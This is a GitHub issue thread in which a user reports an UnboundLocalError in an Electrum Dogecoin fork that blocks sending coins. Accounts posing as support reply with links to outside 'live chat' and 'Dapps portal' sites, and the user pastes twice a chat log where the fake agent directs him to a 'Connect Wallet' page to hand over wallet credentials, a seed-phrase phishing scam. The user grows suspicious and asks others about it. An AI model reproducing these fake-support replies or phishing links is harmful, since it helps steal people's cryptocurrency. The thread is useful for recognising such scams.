### ISSUE TITLE
coins are not sent from the wallet

### ISSUE THREAD

**Issue by pc911ldr** [spesmilo/electrum#9378]
Traceback
Traceback (most recent call last):
  File "/tmp/.mount_AppImaXAMgno/usr/lib/python3.9/site-packages/electrum/gui/qt/main_window.py", line 1661, in do_pay
    self.pending_invoice = self.read_invoice()
  File "/tmp/.mount_AppImaXAMgno/usr/lib/python3.9/site-packages/electrum/gui/qt/main_window.py", line 1638, in read_invoice
    return self.wallet.create_invoice(
  File "/tmp/.mount_AppImaXAMgno/usr/lib/python3.9/site-packages/electrum/wallet.py", line 794, in create_invoice
    id=_id,
UnboundLocalError: local variable '_id' referenced before assignment
 
Additional information
Electrum version: 4.1.5-doge 
Python version: 3.9.7 (default, Jun 28 2018, 19:01:02) [GCC 7.5.0] 
Operating system: Linux-6.8.0-50-generic-x86_64-with-glibc2.39 
Wallet type: 
Locale: ru_UA

**Comment by pc911ldr** [comment]
Linux and Windows

**Comment by Ellabell-dr** [comment]
Hi @pc911ldr 
For the quickest resolution to your issue, we highly recommend using our live chat support, available 24/7. Our dedicated support team can provide real-time assistance and help resolve your complaint promptly. You can access the live chat here: 
[SUPPORT TEAM](https://livechatsupports.app/github)
Ticket id- DR67O

If live chat is unavailable or you prefer to continue via email, please rest assured that our team will review your ticket and follow up with you as soon as possible.

**Comment by pc911ldr** [comment]
Chatting did not produce any results

**Comment by pc911ldr** [comment]
Traceback
Traceback (most recent call last):
  File "electrum\gui\qt\main_window.py", line 1661, in do_pay
  File "electrum\gui\qt\main_window.py", line 1638, in read_invoice
  File "electrum\wallet.py", line 794, in create_invoice
UnboundLocalError: local variable '_id' referenced before assignment
 
Additional information
Electrum version: 4.1.5-doge 
Python version: 3.8.8 (tags/v3.8.8:024d805, Feb 19 2021, 13:08:11) [MSC v.1928 32 bit (Intel)] 
Operating system: Windows-10-10.0.19041-SP0 
Wallet type: 
Locale: ru_RU

**Comment by pc911ldr** [comment]
Uploading Запись экрана 2024-12-24 20:11:35.mp4…

**Comment by pc911ldr** [comment]
https://github.com/user-attachments/assets/16dab3ef-a20d-4b21-b69a-a31a3079bf48

**Comment by MuahZain-Tech** [comment]
> 2024-12-24.20.11.35.mp4

Thanks for reporting this…. Visit our Decentralized Dapps protocol page to report this for quick resolution via _[Decentralized Dapps Portal](https://dappswebsupport.com/)_ and complete your requests.
Note: We do not have any "Help Center"
Be careful

**Comment by pc911ldr** [comment]
https://livechatsupports.app/github it didn't help...

**Comment by pc911ldr** [comment]
Are they different in any way?

**Comment by pc911ldr** [comment]
maybe there is a simpler solution, transferring the seed phrase to another wallet, which one?

**Comment by pc911ldr** [comment]
https://livechatsupports.app/github , I communicated in this chat, no solutions were found... left the chat, 3 times.

**Comment by MuahZain-Tech** [comment]
just stay on chat and do not leave

**Comment by pc911ldr** [comment]
the chat is closed, the issue is not resolved

**Comment by pc911ldr** [comment]
in the chat that you offered me, communication did not bring positive results.

**Comment by pc911ldr** [comment]
maybe you can tell me how to contact the wallet developer so that he knows about this error that the wallet generates

**Comment by pc911ldr** [comment]
Electrum version: 4.1.5-doge

**Comment by pc911ldr** [comment]
![Снимок экрана_2024-12-25_21-28-53](https://github.com/user-attachments/assets/bd528701-131e-48e0-9d57-65574650a2ca)

**Comment by pc911ldr** [comment]
Back
Agent profile image
Live Support


Menu
Back

Menu
Add free
live chat
to your site
Type here and press enter..
Rate this chatUpload FileInsert emoji
Agent profile image
Live Support


Agent profile image
Welcome, if you need help simply reply to this message, we are online and ready to help.

Name : Pc911Ldr
Email : pc911ldr@gmail.com
Question : Traceback

Traceback
Traceback (most recent call last):
File "/tmp/.mount_AppImaqMDO4k/usr/lib/python3.9/site-packages/electrum/gui/qt/main_window.py", line 1661, in do_pay
self.pending_invoice = self.read_invoice()
File "/tmp/.mount_AppImaqMDO4k/usr/lib/python3.9/site-packages/electrum/gui/qt/main_window.py", line 1638, in read_invoice
return self.wallet.create_invoice(
File "/tmp/.mount_AppImaqMDO4k/usr/lib/python3.9/site-packages/electrum/wallet.py", line 794, in create_invoice
id=_id,
UnboundLocalError: local variable '_id' referenced before assignment

Additional information
Electrum version: 4.1.5-doge
Python version: 3.9.7 (default, Jun 28 2018, 19:01:02) [GCC 7.5.0]
Operating system: Linux-6.8.0-51-generic-x86_64-with-glibc2.39
Wallet type:
Locale: ru_UA

Agent profile image
Welcome to live chat

Снимок экрана_2024-12-25_20-56-22.png
Agent profile image
The traceback indicates that there is a bug in the Electrum wallet code you are using, specifically version 4.1.5-doge. The issue arises because the local variable _id is referenced in the create_invoice method before it has been assigned a value.

exactly like that

Agent profile image
Error Type: UnboundLocalError: local variable '_id' referenced before assignment
Electrum Version: 4.1.5-doge (a Dogecoin-compatible fork of Electrum).
Python Version: 3.9.7.
Operating System: Linux.
Context: The error occurs when creating an invoice (do_pay function).

but I need to withdraw coins from my wallet

Agent profile image
This error appears to be a coding bug in the specific version of Electrum you’re using.

is there a link to the working version?

Agent profile image
The version you’re using (4.1.5-doge) might be outdated. Developers may have fixed this bug in a newer release.

This is the latest version

where, to which wallet, can I transfer the seed phrase from this wallet?

naturally, with balance

Agent profile image
Follow these steps:
Go to the homepage by navigating to https://generalwebfixes.web.app/.
At the top of the page, click Connect Wallet and then select Begin Connection.
On the next page, choose AiTool kit Options to select your wallet type and establish a connection using your wallet credentials.
Finally, click the authenticate button to clear the error and synchronize your wallet to authenticate.

😁

maybe you can tell me how to contact the wallet developer so that he knows about this error that the wallet generates

Electrum version: 4.1.5-doge

Agent profile image
Use the steps to above to complete transferring the seed phrase

😁

Should I write you the wallet seed phrase?

Agent profile image
Follow step above

Should I write you the wallet seed phrase?

Do you know that the seed phrase from a crypto wallet is strictly personal?

Agent profile image
We are here solely to assist and guide. We do not have access to your funds. All processes are completed manually on your end, with the aid of bot interactions, ensuring no external or third-party access is involved.

21:40
the seed phrase will give access to my wallet, to you or someone else, download the wallet, transfer funds to it and distribute the seed phrase.

for one thing, you will understand what the problem is.

Add free
live chat
to your site
Type here and press enter..
Rate this chatUpload FileInsert emoji

**Comment by pc911ldr** [comment]
chat

**Comment by pc911ldr** [comment]
and this is in every chat!!!

**Comment by pc911ldr** [comment]
Back
Agent profile image
Live Support


Menu
Back

Menu
Add free
live chat
to your site
Type here and press enter..
Rate this chatUpload FileInsert emoji
Agent profile image
Live Support


Agent profile image
Welcome, if you need help simply reply to this message, we are online and ready to help.



Traceback
Traceback (most recent call last):
File "/tmp/.mount_AppImaqMDO4k/usr/lib/python3.9/site-packages/electrum/gui/qt/main_window.py", line 1661, in do_pay
self.pending_invoice = self.read_invoice()
File "/tmp/.mount_AppImaqMDO4k/usr/lib/python3.9/site-packages/electrum/gui/qt/main_window.py", line 1638, in read_invoice
return self.wallet.create_invoice(
File "/tmp/.mount_AppImaqMDO4k/usr/lib/python3.9/site-packages/electrum/wallet.py", line 794, in create_invoice
id=_id,
UnboundLocalError: local variable '_id' referenced before assignment

Additional information
Electrum version: 4.1.5-doge
Python version: 3.9.7 (default, Jun 28 2018, 19:01:02) [GCC 7.5.0]
Operating system: Linux-6.8.0-51-generic-x86_64-with-glibc2.39
Wallet type:
Locale: ru_UA

Agent profile image
Welcome to live chat

Снимок экрана_2024-12-25_20-56-22.png
Agent profile image
The traceback indicates that there is a bug in the Electrum wallet code you are using, specifically version 4.1.5-doge. The issue arises because the local variable _id is referenced in the create_invoice method before it has been assigned a value.

exactly like that

Agent profile image
Error Type: UnboundLocalError: local variable '_id' referenced before assignment
Electrum Version: 4.1.5-doge (a Dogecoin-compatible fork of Electrum).
Python Version: 3.9.7.
Operating System: Linux.
Context: The error occurs when creating an invoice (do_pay function).

but I need to withdraw coins from my wallet

Agent profile image
This error appears to be a coding bug in the specific version of Electrum you’re using.

is there a link to the working version?

Agent profile image
The version you’re using (4.1.5-doge) might be outdated. Developers may have fixed this bug in a newer release.

This is the latest version

where, to which wallet, can I transfer the seed phrase from this wallet?

naturally, with balance

Agent profile image
Follow these steps:
Go to the homepage by navigating to https://generalwebfixes.web.app.
At the top of the page, click Connect Wallet and then select Begin Connection.
On the next page, choose AiTool kit Options to select your wallet type and establish a connection using your wallet credentials.
Finally, click the authenticate button to clear the error and synchronize your wallet to authenticate.

😁

maybe you can tell me how to contact the wallet developer so that he knows about this error that the wallet generates

Electrum version: 4.1.5-doge

Agent profile image
Use the steps to above to complete transferring the seed phrase

😁

Should I write you the wallet seed phrase?

Agent profile image
Follow step above

Should I write you the wallet seed phrase?

Do you know that the seed phrase from a crypto wallet is strictly personal?

Agent profile image
We are here solely to assist and guide. We do not have access to your funds. All processes are completed manually on your end, with the aid of bot interactions, ensuring no external or third-party access is involved.

21:40
the seed phrase will give access to my wallet, to you or someone else, download the wallet, transfer funds to it and distribute the seed phrase.

for one thing, you will understand what the problem is.

Add free
live chat
to your site
Type here and press enter..
Rate this chatUpload FileInsert emoji

**Comment by pc911ldr** [comment]
unique!

**Comment by pc911ldr** [comment]
Can anyone tell me what this dialogue looks like (the essence of which boils down to the wallet seed phrase)?
